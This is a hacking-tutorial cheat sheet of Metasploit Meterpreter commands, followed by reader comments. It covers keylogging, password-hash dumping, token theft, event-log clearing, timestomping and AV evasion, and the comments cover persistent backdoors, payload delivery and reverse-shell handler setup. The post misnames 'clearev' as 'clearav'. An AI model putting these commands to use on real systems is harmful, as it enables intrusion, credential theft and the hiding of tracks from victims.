Hack Like a Pro: The Ultimate Command Cheat Sheet for Metasploit's Meterpreter

The Ultimate Command Cheat Sheet for Metasploit's Meterpreter

Welcome back, my hacker novitiates!

I've done numerous tutorials in Null Byte demonstrating the power of Metasploit's meterpreter. With the meterpreter on the target system, you have nearly total command of the victim!

As a result, several of you have asked me for a complete list of commands available for the meterpreter because there doesn't seem to be a complete list anywhere on the web. So here it goes! Hack a system and have fun testing out these commands!

Step 1: Core Commands

At its most basic use, meterpreter is a Linux terminal on the victim's computer. As such, many of our basic Linux commands can be used on the meterpreter even if it's on a Windows or other operating system.

Here are some of the core commands we can use on the meterpreter.

  • ? - help menu
  • background - moves the current session to the background
  • bgkill - kills a background meterpreter script
  • bglist - provides a list of all running background scripts
  • bgrun - runs a script as a background thread
  • channel - displays active channels
  • close - closes a channel
  • exit - terminates a meterpreter session
  • help - help menu
  • interact - interacts with a channel
  • irb - go into Ruby scripting mode
  • migrate - moves the active process to a designated PID
  • quit - terminates the meterpreter session
  • read - reads the data from a channel
  • run - executes the meterpreter script designated after it
  • use - loads a meterpreter extension
  • write - writes data to a channel

Step 2: File System Commands

  • cat - read and output to stdout the contents of a file
  • cd - change directory on the victim
  • del - delete a file on the victim
  • download - download a file from the victim system to the attacker system
  • edit - edit a file with vim
  • getlwd - print the local directory
  • getwd - print working directory
  • lcd - change local directory
  • lpwd - print local directory
  • ls - list files in current directory
  • mkdir - make a directory on the victim system
  • pwd - print working directory
  • rm - delete a file
  • rmdir - remove directory on the victim system
  • upload - upload a file from the attacker system to the victim

Step 3: Networking Commands

  • ipconfig - displays network interfaces with key information including IP address, etc.
  • portfwd - forwards a port on the victim system to a remote service
  • route - view or modify the victim routing table

Step 4: System Commands

  • clearav - clears the event logs on the victim's computer
  • drop_token - drops a stolen token
  • execute - executes a command
  • getpid - gets the current process ID (PID)
  • getprivs - gets as many privileges as possible
  • getuid - get the user that the server is running as
  • kill - terminate the process designated by the PID
  • ps - list running processes
  • reboot - reboots the victim computer
  • reg - interact with the victim's registry
  • rev2self - calls RevertToSelf() on the victim machine
  • shell - opens a command shell on the victim machine
  • shutdown - shuts down the victim's computer
  • steal_token - attempts to steal the token of a specified (PID) process
  • sysinfo - gets the details about the victim computer such as OS and name

Step 5: User Interface Commands

  • enumdesktops - lists all accessible desktops
  • getdesktop - get the current meterpreter desktop
  • idletime - checks to see how long since the victim system has been idle
  • keyscan_dump - dumps the contents of the software keylogger
  • keyscan_start - starts the software keylogger when associated with a process such as Word or browser
  • keyscan_stop - stops the software keylogger
  • screenshot - grabs a screenshot of the meterpreter desktop
  • set_desktop - changes the meterpreter desktop
  • uictl - enables control of some of the user interface components

Step 6: Privilege Escalation Commands

  • getsystem - uses 15 built-in methods to gain sysadmin privileges

Step 7: Password Dump Commands

  • hashdump - grabs the hashes in the password (SAM) file

Note that hashdump will often trip AV software, but there are now two scripts that are more stealthy, "run hashdump" and "run smart_hashdump". Look for more on those on my upcoming meterpreter script cheat sheet.

Step 8: Timestomp Commands

  • timestomp - manipulates the modify, access, and create attributes of a file

Stay Tuned for More Meterpreter Tips

I've already used many of these commands in previous tutorials, and I will be using more in future guides as well to show you how they work. Also, bookmark this page as it is possibly the most complete cheat sheet of meterpreter commands found anywhere on the web, so you'll want it to refer back to this sheet often.

Finally, check out my second meterpreter cheat sheet with the 135 scripts available for the meterpreter to continue hacking with metasploit.

36 Comments

What if I wanted to connect to a meterpreter shell again, say after closing the connection on my machine, assuming the victim device is set up with a persistent backdoor?

Keane:

Welcome to Null Byte!

Good question. A meterpreter terminal is terminated when the target system is shutdown. To build a persistent connection, use the persistence command. Check out this tutorial .

OTW

What if I set up the persistent connection on the victim, but I disconnect or reboot my Kali machine? Can I reconnect to the exploited victim without running a new exploit?

Keane:

You can, if you set up a persistent connection. Check out this post.

OTW

Thanks, once I have done that, how can I connect back to the victim computer if I terminate meterpreter on my end (i.e. closing terminal, rebooting etc.)? Do I need to use netcat or something in Metasploit to connect to the persistent backdoor?

Keane:

Once you have setup a persistent backdoor, that backdoor will keep attempting to connect to your IP. When you open up Metasploit, you will get a session from the connecting machine.

OTW

Late question have probably upgradedthe computer will keep connecting given when the router reboots and clients get new ups the persistence backdoor will die, any way to prevent that from happening?

heloo sir i want to learn how to hack please help me.

You are in the right place.

Join Null Byte and follow me.

Can you please tell me how I access meterpreter, as in change from msf to meterpreter, so that the command looks like this

meterpreter > I type stuff here (example)

I've been searching google for this but can't find this.

Cezary:

You only get the meterpreter prompt when you have successfully installed meterpreter on a target system.

OTW

oh so if I for example send an exploited word document for the webcam exploit, and my target opens it, then it should bring me to meterpreter?

And I am using Windows 7. Thanks for the quick answer by the way :)

Once again, sorry for stupid/simple questions, I'm pretty new to this.
Thank you.

Is there a command the will let you browse and download files from the victim's computer?

You can browse through their computer the same way you would on any Linux machine.

As for downloading files, there is the "download" command.

OTW... I am new here. .. getsystem and hashdump command is not running properly.........

Muneeb:

Welcome to Null Byte!

Can you give us more information? When you say they are not running right, what do you mean? What error messages are you getting?

OTW

And sorry for my english or tone........

when commands to metasploit there are many options to add to those commands as well, such as -c -p sV is there a guide to those?

thank you.

Hi sir I like hacking I want to know how to hack please help me

You could read through the articles posted around the site...

can u explain how to use "getdesktop" command?

theres no "init.d" it just says "operation failed" and then whenever i do "sh anything.sh" it echo's "system fault" :/ help

Hey got a meterpreter session on an android device, using a generated PAYLOAD , do you know any of the commands to navigate files on an android device

Sorry i should of specified, i can navigate in shell, but i cant get permissions for somthings chmod -R 777 does not do anything and su does not work, the device is un-rooted , is there a meterpreter extension module that i can download and use , or a command or script?

nice shot, thanks your articles

Hi, I wanted to set up a meterpreter session via social engineering. I ran Kali linux in a virtual machine and used SET and Metasploit to do this. A payload was created and I succeeded to set up a meterpreter session with my actual computer so I could control my own computer with metasploit in the virtual machine. After setting the virtual machine to bridging I could also open the payload on the other computers in my network with succes(a meterpreter session was opened) but I don't succeed in doing this with a computer that is not on my home network so for example a computer at my friends home. What should I change to make this possible?

You need to use your public IP and port forwarding.

so instead of using the IP of my computer for LHOST I should use my public IP and forward this IP with the port I set for LPORT?

1.maybe theport ain't ur firewall blocked it,
2.change every thing that is 192 or 10. Depends on ur l ip with jr wan ip

I found my public IP and portforwarded it but when I fill it in in my URL I get nothing, does this matter?

hello. can anyone pls help me. after i create .bat and send it to the victim over the internet (he knows im testing on him) the session opens and everything. . meterpreter works. but when i background and close it. and want to open again i have no sessions. i've tried many methods. like the one with persistence or use exploit/multi/handler..Set LHOST..set LPORT . set payload windows/meterpreter/reversetcp. exploit-j .. i need a reply as soon as possible.thx.i have portforwarded 443 and 4444. and also i have a dynamic ip

There's a typo up there OTW, it's clearev NOT clearav.
Typing clearav doesn't work and wil get an error saying "Unknown Command."Hope this helps everyone.

TRINITY

hi and ty for this post ! im new to this forum and i have some experience in pentesting but im not a pro (i wish) This is my problem:

I have setup an testlab and i manage to get a meterpreter session over WAN on an old android using the stagefright exploit.

after this i type : sessions -i 1 to connect to session 1 But now the weird part (for me then) It only shows me the CORE COMMANDS and i have no idea what to do now or how to upgrade this meterpreter session to fully gain acces to the mobile device. Does anyone have some tips for me?

And i have also another question : Is it possible to make an php scipt and place that php file together with my index file in de apache root that i can use to hack my mobile with only 1 click? With a full meterpreter session?

Ty in advance

Share Your Thoughts

  • Hot
  • Latest